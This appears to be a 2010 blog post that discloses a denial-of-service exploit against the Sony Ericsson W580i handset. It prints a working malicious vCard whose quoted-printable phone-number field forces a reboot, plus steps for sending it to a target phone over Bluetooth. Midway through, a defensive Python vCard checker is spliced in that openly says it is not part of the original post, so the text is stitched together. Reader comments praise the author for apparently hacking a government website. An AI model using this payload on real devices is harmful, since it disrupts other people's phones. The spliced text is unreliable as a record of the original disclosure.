SHAHEE MIRZA

Sooner or later you have to wake up.

DoS: Sony Ericsson Phone memory Contact.


Pen-tested Subject: Sony Ericsson Phone Contact.
Discovery Date: 19/03/2010.
Exploit Date: 10/04/2010.
Test Object: Sony Ericsson W580i.
Used Tools: BlueTooth, MyPhoneExplorer and Textpad.
Vulnerability: Denial of Service.
Result : Automatic Force Reboot.
Greetings : FaceBook!! Yaa FaceBook!!
Note: None.


0x01: Introduction:

My younger brother suddenly informed me that his phone had a problem: it reboots when he tries to call a contact. He also said: “I was working with Digital V-Cards”.

0x02: Description:

A normal V-Card as saved in the SE phone contacts:


BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8:;Unknown
FN;CHARSET=UTF-8:Unknown
TEL;CELL:+8801111112222
X-IRMC-LUID:00020000009A
END:VCARD

Take a close look at the V-Card: a character set encoding (UTF-8) is declared on N (Name) and FN (Family Name).

Why is that character encoding used there? Because SE supports many types of special symbols for writing a contact name to phone memory, and it is a multilingual handset.

UTF-8 (8-bit UCS/Unicode Transformation Format) is a variable-length character encoding for Unicode. It is able to represent any character in the Unicode standard, yet is backwards compatible with ASCII. For these reasons, it is steadily becoming the preferred encoding for e-mail, web pages, and other places where characters are stored or streamed.
UTF-8 encodes each character (code point) in 1 to 4 octets (8-bit bytes), with the single-octet encoding used only for the 128 US-ASCII characters.

0x03: Ideas:

1. Let us use some special symbols in the contact name (V-Card).
2. Why not set encoded data in the CELL number (V-Card) as well?
3. Hopefully the SE developers never thought that a user could set their V-Card manually, and hopefully their decoding mechanism is not prepared to decode the CELL number.

0x04: Ideas execution:

Let us see another V-Card, one that uses special symbols.


BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:;Unknown...=C2=A3
FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown...=C2=A3
TEL;CELL: +8801111112222
X-IRMC-LUID:000200000001
END:VCARD

It works perfectly.

0x05: Exploit:

Successfully exploited V-Card.


BEGIN:VCARD
VERSION:2.1
N;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:V=01;Unknown
FN;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:Unknown V=01
TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:0000000000000000000000000000000=
0000000000000000000000000000000000000000000000000=EB=BA=BA
X-IRMC-LUID:00020000001F
END:VCARD

0x06: Attack Method:

1. Save this exploited V-Card.
2. Send this V-Card to targeted phone via Bluetooth from your computer or phone.

0x07: Effect:

The phone force-reboots if the victim tries to DELETE, EDIT, CALL or VIEW that V-Card.
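A defensive check for the failure described above, added here as an example (it is not code from the original post or from Sony Ericsson): before storing a received vCard 2.1, an importer can decode each TEL value and refuse cards whose number is encoded, non-dialable or overlong. The digit limit, the dial-string alphabet and the function names are assumptions.

```python
import quopri
import re

MAX_TEL_DIGITS = 32  # assumed policy limit, not a vCard rule (E.164 allows 15 digits)
DIALABLE = re.compile(r"\+?[0-9*#pPwW ().-]+")  # assumed dial-string alphabet

def logical_lines(text):
    """Yield property lines, joining quoted-printable soft breaks ('=' at EOL)."""
    pending = None
    for raw in text.splitlines():
        line = raw if pending is None else pending + raw
        pending = None
        head = line.split(":", 1)[0].upper()
        if "QUOTED-PRINTABLE" in head and line.endswith("="):
            pending = line[:-1]          # drop the soft break, keep reading
        elif line.strip():
            yield line
    if pending is not None:              # card ended in the middle of a soft break
        yield pending

def check_vcard(text):
    """Return the reasons why TEL properties in a vCard 2.1 text look unsafe."""
    reasons = []
    for line in logical_lines(text):
        head, sep, value = line.partition(":")
        name, *params = head.upper().split(";")
        if not sep or name != "TEL":
            continue
        if any(p.startswith(("ENCODING=", "CHARSET=")) for p in params):
            reasons.append("TEL carries an encoding or charset parameter")
        if "ENCODING=QUOTED-PRINTABLE" in params:
            raw = quopri.decodestring(value.encode("ascii", "replace"))
            value = raw.decode("utf-8", "replace")
        value = value.strip()
        if not DIALABLE.fullmatch(value):
            reasons.append("TEL contains non-dialable characters")
        if sum(ch.isdigit() for ch in value) > MAX_TEL_DIGITS:
            reasons.append("TEL has more than %d digits" % MAX_TEL_DIGITS)
    return reasons

# Constructed samples: NORMAL mirrors the page's first card, SUSPECT its third.
NORMAL = "BEGIN:VCARD\nVERSION:2.1\nN:;Unknown\nTEL;CELL:+8801111112222\nEND:VCARD\n"
SUSPECT = ("BEGIN:VCARD\nVERSION:2.1\nN:;Unknown\n"
           "TEL;CHARSET=UTF-8;ENCODING=QUOTED-PRINTABLE:" + "0" * 31 + "=\n"
           + "0" * 49 + "=EB=BA=BA\nEND:VCARD\n")

if __name__ == "__main__":
    print(check_vcard(NORMAL))
    print(check_vcard(SUSPECT))
```
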

0x08: References:

1. Wikipedia.
2. SE Manual.

0x09: Credits:

a. Shakil Mirza.
b. Shahee Mirza.

0x10: Conclusion:

I think there is a vulnerability in the Sony Ericsson handset’s Bluetooth. Multi-request and too much DATA flow may cause DoS.


5 Comments

  1. Tareq, June 6, 2010 at 5:48 pm

    Lolz, that's kinda funny thing

  2. Shahee Mirza (Author), June 6, 2010 at 6:13 pm

    Funny !!!!!!! :s :P :P

  3. jobbar, July 20, 2010 at 11:33 am

    I didn't understand !!!

  4. Sakil, August 10, 2010 at 5:09 pm

    Brother, the incident you caused by hacking the RAB website embarrassed RAB a lot !!! I am your new fan. How could you be hacked ???

  5. Asaduzzaman, November 8, 2010 at 8:30 pm

    I am fascinated by you. But I don't want to stay quiet. When will I become a successful hacker……
